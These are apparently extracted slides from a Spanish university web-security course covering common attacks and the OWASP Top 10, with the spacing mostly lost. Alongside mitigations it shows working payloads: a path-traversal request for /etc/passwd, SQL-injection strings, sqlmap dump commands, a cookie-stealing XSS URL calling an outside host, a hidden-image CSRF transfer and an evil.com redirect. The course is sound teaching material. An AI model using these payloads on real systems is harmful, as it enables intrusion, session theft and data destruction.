CURSO DE SEGURIDAD WEB - ssyf.ua.es · con un ataque de diccionario, el cual ... que hagan clic...

CursodeseguridadWEB

José[email protected]

Índice

1. Introducción2. Losataquesmás comunes3. Los10grandesagujerosdeseguridad4. Medidasdeproteccióndeataquesweb5. Enlacesdeinterés

1.Introducción

• Contenidosdelcurso– Losataqueswebmáscomunes.– Losagujerosmástípicosdeseguridadwebycómoevitarlos.

1.Introducción

• Objetivosdelcurso– Conocerorecordarlosposiblesproblemas– Evitarcometerestoserrores

1.Introducción

• ¿Quéocurrecuandoretasahackersexpertosahackearte?(What HappensWhen You Dare Expert HackersToHackYou)

https://www.youtube.com/watch?v=F78UdORll-Q

2.Losataquesmás comunes

• Fuerzabruta• Inyeccióndescript• Inyeccióndecódigo• Spoofing• Tampering• Repudio


• Divulgacióndeinformación• Denegacióndeservicio• Elevacióndeprivilegios• Inyeccióndeficheros• Fuzzing• Escaladodedirectorios


• Seguridadporocultación• Secuestrodesesión• Desbordamientodebuffer• Fugadeinformación• Ingenieríasocial


• Fuerzabruta:– Ataquequepruebatodaslascombinacionesposibleshastaencontraraquellaquepermitaelacceso.Secombinaconunataquedediccionario,elcualcontieneunlistadodepalabras,envezdegenerartodaslascombinacionesposibles.


• Fuerzabruta:– Permiteencontrarcredencialesdeaccesoaservicios.Requieremuchotiempoypuedegenerarmucho“ruido”enlossistemas(podríabloquearausuarioslegítimosygenerarlesuna“denegacióndeservicio”).

– Ejemplo:usodeTHC-Hydra(https://www.youtube.com/watch?v=rLtj8tEmGso)


• Inyeccióndescript:– elobjetivoeslograrinyectar enelcontextodeundominiouncódigo Javascript,VBScriptosimplementeHTML,conlafinalidaddeengañaralusuarioorealizarunaacciónnodeseadasuplantándole.Elafectadonoeselservidor(comopuedeserenunataquedeSQLInjection),sinoelusuario.


• Inyeccióndescript:– Cross-Site Scripting(XSS)– Cross-Site Request Forgery (CSRF)– Clickjacking:engañaralosusuariosparaquehaganclicsobreelementosdeunsitioweb. Serealizasuperponiendodospáginasmedianteelusodeiframes.


• Inyeccióndecódigo:– elusuariopuedeintroducircualquierparámetroenunaaplicación(intérpretes:SQL,LDAP,Xpath,etc.)yconseguircomportamientosnodeseados.


• Spoofing:– obteneraccesoaunsistemaoainformaciónusandounaidentidadfalsa.Puedesersuplantación deMAC,IP,credenciales(phishing),teléfono…

– Ejemplo:esmuyfácilenviaruncorreohaciéndosepasarporotrapersona.


• Tampering:– falsificaciónoalteracióndelainformación.Porejemplocambiandolasvariableshiddendeunformulario.

– Ejemplo:https://www.youtube.com/watch?v=3DCgPVckn1M


• Repudio(Repudiation):– habilidaddelosusuarios(legítimosyatacantes)paranegarhaberrealizadociertasacciones.Sinunaauditoríaadecuada,losataquesderepudiosonmuydifícilesdeprobar.


• Repudio(Repudiation):– Ejemplo:Elusuariosequejaporquealgoselehaborrado.Sinotenemosunabuenaauditoríadelasaccionesllevadasacaboporelusuario,noseráposibledemostrarquefueélmismoelqueeliminólainformación.


• Divulgación deinformación(InformationDisclosure):– unusuarionopermitidopuedeaccederainformaciónsensible.

– Ejemplo: ponerlacadenadeconexión enuncomentariodentrodelapáginaweb.


• Denegacióndeservicio(Denial ofService):– ataquesquecausanquelosserviciosofrecidosporunaorganizaciónnoesténdisponiblesparalosusuarioslegítimos.

– Top10deataquesDDoS:https://openwebinars.net/blog/top-10-de-ataques-dos-denial-of-service-o-denegacion-de-servicios/


• Elevacióndeprivilegios(Elevation ofPrivilege):– unusuariopuedecambiarsuniveldeprivilegiosdentrodeunsistemaparaaccederainformaciónoserviciosqueestánrestringidosparasuidentidad.

– Más adelanteveremosejemplosdeesteataqueaplicadoanuestrasapps(A7).


• Inyeccióndeficheros:– ejecutarcódigoremotodentrodelaaplicaciónvulnerable.Sebasaenlaideadeque,aligualqueesposiblecargarunficherolocalparasuinclusióndentrodeunapágina,sepodríacargarunoremotoquecontuviesecódigomalicioso.


• Fuzzing:– diferentestécnicasdetesteodesoftwarecapacesdegeneraryenviardatossecuencialesoaleatoriosaunaovariasáreasopuntosdeunaaplicación,conelobjetodedetectardefectosovulnerabilidadesexistentesenelsoftwareauditado.


• Fuzzing:– esutilizadocomocomplementoalasprácticashabitualesdechequeodesoftware,yaqueproporcionancoberturaafallosdedatosyregionesdecódigonotestados,graciasalacombinacióndelpoderdelaaleatoriedadyataquesheurísticosentreotros.


• Escaladodedirectorios(Path Travesal):– ataquequevaalograraccederainformaciónreferentealservidor,desdesimplementeeldirectoriodondeseestáejecutandolaaplicaciónwebhastalogrardescargarficherosdelservidor.


• Escaladodedirectorios(Path Travesal):– Ejemplo:TenemoselsiguientearchivoPHP

<?php$template ='blue.php';if (isset($_COOKIE['TEMPLATE']))

$template =$_COOKIE['TEMPLATE'];include ("/home/users/phpguru/templates/".$template );

?>


• Escaladodedirectorios(Path Travesal):– Ejemplo:RealizandolasiguientellamadaporHTTPmodificada:

GET/vulnerable.php HTTP/1.0Cookie:TEMPLATE=../../../../../../../../../etc/passwd

– Elpropioservidornosdevolvería todoelcontenidodelficherodepasswords.


• Seguridadporocultación:– usoporpartedelosprogramadoresdedirectoriosespecíficosparaactividadesespecíficascomolaadministración,zonasdepruebasosubidadeficherostemporales.


• Seguridadporocultación:– estosdirectoriossepuedendescubrirmediantepruebasmanualesohaciendousodealgúnprogramatipofuzzer querealicelaspeticionespornosotros.


• Secuestrodesesión(Hijacking):– ataquequeconsisteenhacersecargodeunasesióndeusuariowebmediantelaobtencióndesuidentificadordesesión,loquepermiteactuarcomosifueseelusuariolegítimo.ElidentificadordesesiónsesuelealmacenarenunacookieoURL.


• Secuestrodesesión(Hijacking):– Ejemplo: VeremoselejemplocuandoabordemoselagujeroA2.


• Desbordamientodebuffer(BufferOverflow):– seproducecuandounprogramanocontrolaadecuadamentelacantidaddedatosquesecopiansobreunáreadememoriareservadaatalefecto(buffer).


• Desbordamientodebuffer(BufferOverflow):– Sidichacantidadessuperioralacapacidadpreasignada,losbytessobrantessealmacenanenzonasdememoriaadyacentes,sobrescribiendosucontenidooriginal,queprobablementepertenecíanadatosocódigoalmacenadosenmemoria.Estoconstituyeunfallodeprogramación.


• Fugadeinformación (info leak):– Salidanocontroladadeinformaciónquehacequeestallegueapersonasnoautorizadasosobrelaquesuresponsablepierdeelcontrol.


• Fugadeinformación (info leak):– Ejemplo:EnPHPtenemosuncódigodeestaforma:

<?php$dsn =‘CADENADECONEXIÓN’;$user =‘jreamdesign’;$password =‘superSecretPass’;

//ConectamosalaBD$dbh =newPDO($dsn,$user,$password)

?>

https://www.youtube.com/watch?v=sR9HC0z5dwI


• Fugadeinformación (info leak):– Ejemplo:ElcódigofuncionaperfectamentehastaqueundíasenoscaelaBDysemuestraelsiguienteerror:


• Fugadeinformación (info leak):– Ejemplo:Parahacerlocorrectamente:<?php

$dsn =‘CADENADECONEXIÓN’;$user =‘jreamdesign’;$password =‘superSecretPass’;//ConectamosalaBDtry{

$dbh =newPDO($dsn,$user,$password)}catch(PDOException $e){

echo“Database error”;}

?>


• Ingenieríasocial:– Noprecisademediostelemáticos.– Convenceraunapersonapararealizaruncambioorevelarunainformación quenodebería,haciéndonospasarporotrapersona.


• Ingenieríasocial:Ejemplo– ¿Quénecesitamosparaobtenerlacontraseñadeunapersonadelauniversidad?

3.Los10grandesagujerosdeseguridad

• OpenWebApplication SecurityProject(OWASP)esunacomunidadquesededicaarealizarencuestasybuscarlosagujerosdeseguridadenlaweb.

• Últimoinformede2013https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Main


• A1 – Injection (Inyección)• A2 – BrokenAuthenticationandSessionManagement

(PérdidadeAutenticaciónyGestióndeSesiones)• A3 – Cross-Site Scripting(XSS)(Secuenciade

ComandosenSitiosCruzados)• A4 – Insecure Direct Object References (Referencia

DirectaInseguraaObjetos)• A5 – SecurityMisconfiguration (Configuraciónde

SeguridadIncorrecta))


• A6 – Sensitive DataExposure (ExposicióndeDatosSensibles)

• A7 – Missing Function Level AccessControl(AusenciadeControldeAccesoalasFunciones)

• A8 – Cross-Site Request Forgery (CSRF)(FalsificacióndePeticionesenSitiosCruzados)

• A9 – Using Known VulnerableComponents (UsodeComponentesconVulnerabilidadesConocidas)

• A10 – Unvalidated Redirects andForwards(Redireccionesyreenvíosnovalidados)

A1- Injection

• Losproblemasdeinyección,talescomodeSQL,OS,yLDAP,ocurrencuandodatosnoconfiablessonenviadosaunintérpretecomopartedeuncomandooconsulta.Losdatoshostilesdelatacantepuedenengañaralinterpreteenejecutarcomandosnointencionadosoaccederadatosnoautorizados.

A1- Injection

• Ejemplo:– SitenemosunapáginawebqueaceptaunparámetroporGETdelestilo:

http://testphp.vulnweb.com/product.php?pic=

– Yeseparámetroseintroducedirectamenteenlaconsultasinningúncontrol,comoenesteejemplo:

String sSql ="SELECT*FROMproducts WHEREproductID=”+Request.Querystring(“pic”);_oBD.TextoComando =sSql;

A1- Injection

• Ejemplo:– Nospodremosencontrarenquenosintroduzcanelsiguienteparámetro:

pic=1or 1=1– Quedandolaconsultadelasiguientemanera:

SELECT*FROMproducts WHEREproductID=1or 1=1

– Obteniendotodoslosproductosdelatabla

A1- Injection

• Ejemplo:– Tambiéndebemostenerencuentaque,esposibleintroducirdirectamenteaccionescomoenelsiguienteparámetro:

pic=1;DROPTABLEproducts;--

A1- Injection

• EjemploSQLMap:– ObtenernombreDatabaseSqlmap –uhttp://testphp.vulnweb.com/product.php?pic=1 --dbs– Delasbasesdedatosobtenidaspodemoselegiracuálatacar:Sqlmap –uhttp://testphp.vulnweb.com/product.php?pic=1 -Dinformation_schema --tables– ObtenemoslascolumnasSqlmap –uhttp://testphp.vulnweb.com/product.php?pic=1 -Dinformation_schema –Tuser_privileges --columns– Obtenemoslosdatosdeunatabla:Sqlmap –uhttp://testphp.vulnweb.com/product.php?pic=1 -Dinformation_schema –Tuser_privileges –Cgrantee,is_grantable,privilege_type --dump

A1- Injection

• Formadesolucionarlo:filtrartodoslosdatosdeentrada quepuedansermodificadosporunusuario(incluidosloshidden).

• Además,en.NET,seresuelveutilizandoBind Variables.

A1- Injection• ¿Cómoevitarlo?

– Filtrar todos los datos de entrada que puedan ser modificados por un usuario (incluidos los hidden).

– Además, en .NET, se resuelve utilizando BindVariables.

A2– Broken authentication andSession Management

• Muchosserviciosoaplicacioneswebtienen«memoria»,reconocenlasaccionesqueelusuarioharealizadoanteriormentecomo,porejemplo,sisetratadeunusuarioregistradoanteriormente,quéelementoshavisitado,etc.Dichodeotromodo,establecenunasesiónconelinternauta.


• ElprotocoloHTTPnoestáorientadoalaconexión.

¿Cómo se mantiene la sesión en una página web?


• ParamantenerlasesiónelnavegadoryelservidorwebcompartenunidentificadorúnicoqueelnavegadorwebincluyeencadapeticiónHTTPoHTTPSrealizadaalportal(generalmentemediantecookies).


• Ejemplo– AccederaUACloud enproducciónconChromeconvuestrousuario.


• Ejemplo– Unavezdentrovolvedalapágina:

https://autentica.cpd.ua.es/cas/login

Osdiráqueyaestáislogueados enelsistema


• Ejemplo– AhoraabrimoslaopcióndeChromeHerramientasparadesarrolladores


• Ejemplo– AhoraospasarélosdoscódigosquedebéisponerenesascookiesparapoderverquepodéisaccederaUACloud comootrousuariosintenersuusuarionipassword.


• Ataques– Prediccióndesesión– CapturadelidentificadoratravésdeXSS– Interceptandolacomunicación– Fijacióndesesión– Erroresenelcierredesesión


• PrediccióndesesiónEstetipodeataquesecentraengenerarunidentificadorválido.Paraello,elatacanteaprovechalospatronesdegeneracióndeidentificadoresdesesiónquepuedautilizarelservidory,unavezreducidoelespaciodebúsqueda,pruebatodaslasposibilidadesmediantefuerzabruta.


• Prediccióndesesión:solución– Aleatorizaciónylongitudsuficientedelidentificadordesesión.Comoejemplo,PHPutilizacomoidentificadorunhashde16o20bytescreadoapartirdeunacadenadetextoquesecomponede:• LadirecciónremotadelclienteHTTP.• Informacióndeltiempodeejecución.• Datosaleatorios.


• CapturadelidentificadoratravésdeXSSSiunapáginawebpresentaunavulnerabilidadCross-Site Scripting(XSS)unatacantepuedeaprovecharlaparaejecutarcódigoquecaptureelcontenidodelacookieyseloenvíe.


• CapturadelidentificadoratravésdeXSS:solución– Activarlaopciónhttponly enelservidorweb.

– DeshabilitarelmétodoTRACE.– SolucionarlavulnerabilidadXSS


• InterceptandolacomunicaciónSisepuedeinterceptareltráficoweb(sinovasecurizado)entrelavíctimayelportalweb,ahoramásquenuncaporelaugedelascomunicacionesinalámbricas,elidentificadordesesióntambiénsepuedecapturar.


• Interceptandolacomunicación:solución– UtilizarelprotocoloHTTPSparaquelacomunicaciónseacifrada.

– ParalascookiesdesesiónactivarlaopciónsecurequeevitaqueelnavegadorpuedaenviarlacookieporHTTPy,portanto,seaposibleobtenerlainterceptandoeltráfico.

– Comoenelataque“Prediccióndesesión”,asociarelidentificadorainformacióndelusuarioúnicacomosudirecciónIP.


• FijacióndesesiónGeneraunidentificadorgenuinoenelportalwebafectadopara,acontinuación,tratardequelavíctimaseautentiqueenelportalconél.Deestemodo,elatacanteobtieneunidentificadordeunusuarioautenticadoquepuedeutilizarpararealizaraccionesenelportalafectadoennombredelavíctima.


• Fijacióndesesión


• Fijacióndesesión:solución– Renovarelidentificadoralautenticarseelusuariooasignarloúnicamentedespuésdelaautenticación.

– Permitirúnicamenteelidentificadorencookies.

– AsociarelidentificadorainformacióndelusuarioúnicacomosudirecciónIP.


• ErroresenelcierredesesiónVisitarlaswebsdelhistóricodelnavegador(enordenadorescompartidos).Silavíctimaolvidócerrarsesiónoelcierredesesiónnoserealizódemaneracorrecta,elatacantepuedeaccederalsitiowebennombredelavíctimasilasesiónnohaexpirado.


• ErroresenelcierredesesiónElmismoproblemaesposiblesielservidor,aunqueelusuariocierresesión,reutilizaelidentificadordesesiónenunnuevoiniciodesesión.Elatacantesólotienequeesperaraquelavíctimainiciesesiónparapoderutilizarelidentificadorcapturado.Lomismosucedesielservidornoinvalidaelidentificadoranteelcierredelasesión.


• Erroresenelcierredesesión:solución– Estableceruntimeout desesión– Estableceruntiempomáximodevalidezdesesión

– Utilizarcookiesnopersistentes– Invalidarlosidentificadoresdesesión– Noreutilizarlosidentificadoresdesesión

A3– Cross-Site Scripting• ConsisteeninyectarcódigoHTMLoJavascriptenunaaplicaciónweb,conelfindequeelnavegadordeunusuarioejecuteelcódigoinyectadoalmomentodeverlapáginaalterada.

• Esunavulnerabilidadmuycomúnhoyendía.• Estavulnerabilidadcompromete,másquenada,laseguridaddelusuarioynoladelservidor.

A3– Cross-Site Scripting• ¿Comoselogra?

• LoprimeroesconseguirinyectarcódigoHTMLalaweb,esdecir,incluirHTMLescritopornosotrosenelcódigofuentedelapáginaquequeremosatacar.

• Elmétodomássencilloyhabitual:usodelosformularios.

A3– Cross-Site Scripting• ¿Comosabersisepermite?

• Buscamosunformulariodeunaaplicación.• Añadimosenelformulariouncódigoscript:

<script>alert(document.cookie);</script>

• Enviamoselformularioyvemossi,alaccederalapáginadondesemuestralainformacióndelformulario,aparecelaalertaintroducida.

A3– Cross-Site Scripting• Tiposdeataques

• DOM-Based XSSoXSSlocal• XSSnopersistente• XSSpersistente

A3– Cross-Site Scripting

• DOM-Based XSSoXSSlocalLadiferenciaestetipodeXSSylosotrostiposdeataque,esqueelcódigoseinyectaatravésdelaURL peronoseincluyeenelcódigofuentedelapágina.Seaprovechadequedespués deunsostenido(#)laURLnoesparseada comotal.


• DOM-Based XSSoXSSlocal:EjemploSitenemosunapágina(http://www.example.com/test.html) cuyocódigointernotieneunscriptJavascript comoeste:<script>document.write("<b>Current URL</b>:"+

document.baseURI);</script>


• DOM-Based XSSoXSSlocal:EjemploPodemospasaralaURLdeesapáginaelsiguientecódigo:

http://www.example.com/test.html#<script>alert(1)</script>

Silavictimalopulsa,conseguiremosqueseejecuteelcódigoJavascript quelehemospasadocomoparámetro.


• XSSnopersistenteSucedecuandounservidorgeneraunapáginainstantáneaderesultadosdeacuerdoainformaciónproporcionadaporelnavegador(ejemplo:unabúsqueda).Silosdatosproporcionadosporelnavegadornosonvalidadosyseincluyenenelcódigofuentedelapágina,hayXSS.


• XSSnopersistente:EjemploTenemosunaweb(http://www.myblog.com)conunapartadoparaloguearse y,alusarlamucho,tenemosactivadoqueseguardelacookie.Tambiéntenemosunaopción debúsquedadeltipo:http://www.myblog.com/searchresult.php?text=


• XSSnopersistente:EjemploElatacanteformaunaURLparaexplotarlavulnerabilidaddelasiguienteforma:

http://www.myblog.com/searchresult.php?text=<script>window.location=’http://miweb.com/xss.php?cookie=’+document.cookie</script>


• XSSpersistenteLadiferenciadeestecross-site scriptingalosanteriores,esquelainyecciónsehaceenunapáginaestática.Lainformaciónproporcionadaporelusuarioesalmacenadaenlabasededatos,enelsistemadearchivosoalgúnotrolugar;despuésesmostradaaotrosusuariosquevisitenlapágina,poresosedicequelavulnerabilidad“persiste”.


• XSSpersistenteElejemploeselquehemosvistoenlaintroduccióndelXSSdeatacarmedianteunformulario.


• ¿Cómoevitarlo?• Codificar los datos no confiables• Limpiar el código HTML

A4– Insecure Direct ObjectReferences

• Unareferenciadirectaaobjetosocurrecuandoundesarrolladorexponeunareferenciaaunobjetodeimplementacióninterno,talcomounfichero,directorio,obasededatos.Sinunchequeodecontroldeaccesouotraprotección,losatacantespuedenmanipularestasreferenciasparaaccederadatosnoautorizados.


• Ejemplo:– EnunaaplicacióndeUACloud usamosbindvariablesparaevitarSQLInjection ytenemoselsiguientecódigo:

String sSql ="SELECT*FROMaccts WHEREaccount =:pCuenta";_oBD.TextoComando =sSql;_oBD.CrearParametro("pCuenta",OracleDbType.Int64,

System.Data.ParameterDirection.Input,0,pCuenta);

¿Qué problema podemos tener?


• Ejemplo:Elproblemaconelquenosencontramosesquecambiandoelnúmerodelparámetro(pCuenta)podríamosaccederalainformacióndecualquiercuentadelaBD.

¿Cómo lo resolvemos?


• Ejemplo:Pararesolverlobastaríaconnosolopreguntarporelnúmerodecuenta,sinoasegurarnosqueelusuarioquelanzalaconsultaeseldueñodelacuentaquequierever.

String sSql ="SELECT*FROMaccts WHEREaccount =:pCuenta andowner =:pOwner";_oBD.TextoComando =sSql;_oBD.CrearParametro("pCuenta",OracleDbType.Int64,System.Data.ParameterDirection.Input,0,pCuenta);_oBD.CrearParametro("pOwner",OracleDbType.Int64,System.Data.ParameterDirection.Input,0,pOwner);


• ¿Cómoevitarlo?• Comprobar el acceso a los datos verificando

que está autorizado.• Utilizar referencias indirectas, nunca dejar

acceder directamente a los recursos sino a través de páginas controladas y con códigos específicos finitos.

A7– Missing Function LevelAccessControl

• Lamayoríadeaplicacioneswebverificanlosderechosdeaccesoaniveldefunciónantesdehacervisibleenlamismainterfazdeusuario.Apesardeesto,lasaplicacionesnecesitanverificarelcontroldeaccesoenelservidorcuandoseaccedeacadafunción.Silassolicitudesdeaccesonoseverifican,losatacantespodránrealizarpeticionessinlaautorizaciónapropiada.


• Ejemplo:UnusuariodeunappdeUACloud quesolotienepermisosparavisualizarcontenido(porejemplounalumnoenelappGuíasDocentes).EsteusuariopuedeprobarnuevasURL’s conociendocomoseprogramanotrasopcionesusandonombressimilaresyencontrarunaURLdelestilo:

https://cvnet.cpd.ua.es/guiadocente/Contexto/Modificar


• Ejemplo:Enunprincipio,esteusuarionotienepermisoparaesaopción,perosinosecontrolaencadapáginaquesolopuedanentrarlaspersonasconpermisos,podríaejecutarlaURLeintentarmodificarelcontexto.

if(!PDIs.ComprobarAcceso()){

returnRedirectToAction("HttpNoAcceso","Error");}


• ¿Cómoevitarlo?• Controlar en cada acceso si el usuario tiene

permiso.• Controlar en los procedimientos de la BD si el

usuario tiene permiso.

A8– Cross-Site Request Forgery

• Esunataquequefuerzaalnavegadorwebdesuvíctima,validadoenalgúnservicio(comoporejemplocorreo,itunes,paginasdebanca,etc.)aenviarunapeticiónaunaaplicacióndeeseservidorparaquerealiceuncambioporejemploenelperfildeeseusuario.


• AlcontrariodelXSS,enelqueelusuariose“fia”delservidor,enesteataqueelservidorse“fia”delusuario


• Ejemplo• Supongamosqueelusuarioestalogueadoenlapágina Webdesubanco(otienelascredencialeslogueadas,memorizadasenelnavegador)


• Ejemplo• Vemosqueporejemplo,pararealizarunatransferencianuestronavegadorenvíaelsiguientecomando(conunproxyosnniferlopodemoscapturar)

GEThttp://bank.com/transfer.do?acct=BOB&amount=100HTTP/1.1

• TransferimosaBOBlacantidadde100€(muysimpleeirrealperonosvaleJ)


• Ejemplo• Nosotroscomoatacantes(yclientesdelbanco)conocemoscomofuncionaydecidimosenviarlealavictimaunmailconcódigoHTMLoculto(porejemploenunmail)

<imgsrc="http://bank.com/transfer.do?acct=YOMISMO&amount=100000"width="0"height="0"border="0">


• Ejemplo• ¿Quéocurrirá?Cuandolavictimahaabiertoelmail,sunavegadorhainterpretadoelcódigo…ycomosuscredencialesyaestaban“logueadas”conelnavegador,haidoaladirecciónocultadelcódigoquelediceasubancoquemehagaunatransferenciade100.000€

Estoevidentementeesunejemplomuysimpleperoqueayudaaentenderlavulnerabilidad.


• ¿Cómoevitarlo?• Configurar el navegador para que no recuerde usuarios y

contraseñas. El modo incógnito es una buena alternativa.• Recordar cerrar la sesión cuando ya no se vaya a hacer uso de la

aplicación y/o servicio.• Se recomienda no utilizar la funcionalidad de aplicaciones web que

permiten mantener la sesión abierta o recordar sesión.• Utilizar diferentes navegadores, uno para información sensible y

otro para navegación en general.• Utilizar complementos que bloqueen la ejecución de scripts. Así los

formularios que se envíen por el metodo POST, no podrán ser enviados automáticamente sin el consentimiento del usuario.

A10– Unvalidated Redirects andForwards

• Lasaplicacioneswebfrecuentementeredirigenyreenvíanalosusuarioshaciaotraspáginasositiosweb,yutilizandatosnoconfiablesparadeterminarlapáginadedestino.

• Sinunavalidaciónapropiada,losatacantespuedenredirigiralasvíctimashaciasitiosdephishing omalware,outilizarreenvíosparaaccederpáginasnoautorizadas.


• Ejemplos– Sinuestraaplicacióntenemosunapáginaparagenerarredirects querecibeunparámetrourl:

http://www.example.com/redirect.aspx?url=evil.com

– Unusuariomalintencionadopuedeusarloparaengañaralusuariohaciéndolecreerquepulsandovaanuestrodominio,peroreenviándoloaunapáginadondesehagaphishing.


• ¿Cómoevitarlo?• Evitando el uso de reenvíos siempre que sea

posible.• Si lo utilizamos, no poner parámetros

fácilmente manipulables por el atacante.• Si los parámetros de destino no pueden ser

evitados, asegúrese que el valor suministrado sea válido y autorizado para el usuario.

4.Medidasdeproteccióndeataquesweb

• Medidasatenerencuentaeneldesarrollodelasaplicacionesweb– Validardatosdeentradaysalida(SQLInjection,XSS).

– Unaúnicalibreríaqueseencarguedefiltrarcualquierentradadeusuario(ClaseSeguridad)

– Consultasparametrizadas (bind variables).


• Medidasatenerencuentaeneldesarrollodelasaplicacionesweb– UsodelmétodoGET deHTTPsóloparalaconsultadeinformación,yelmétodoPOSTparaelintercambioyenvíodeinformaciónporpartedelosclientesalaaplicaciónweb.


• Medidasatenerencuentaeneldesarrollodelasaplicacionesweb– Lascabeceras HTTPpuedensermanipuladasfácilmenteporunatacanteynodebenemplearsecomométododevalidaciónodeenvíodeinformación.

– Homogeneizarpáginasdeerrorenproducción.Evitaofrecerdatosdelossistemasinternos.


• Medidasatenerencuentaeneldesarrollodelasaplicacionesweb– Políticadecontraseñas robustas.– Evitarprotocolosinseguros,comoHTTP,Telnet,FTP,etc.Cifrar lascomunicaciones(TLS,noSSL).

– Evitarla“subida”deficheros.Sinoesposible,securizar elproceso.

5.Enlacesdeinterés

• What Happens When You Dare ExpertHackersToHack Youhttps://www.youtube.com/watch?v=F78UdORll-Q

• Peligrosycontramedidas:https://msdn.microsoft.com/en-us/library/ff648641.aspx

• EjemplosXSS:https://www.youtube.com/watch?v=o3Fc92TMheo

• EjemploCSRF:https://www.youtube.com/watch?v=8Z4CaC2R-8E

CURSO DE SEGURIDAD WEB - ssyf.ua.es · con un ataque de diccionario, el cual ... que hagan clic...

Documents

Transcript of CURSO DE SEGURIDAD WEB - ssyf.ua.es · con un ataque de diccionario, el cual ... que hagan clic...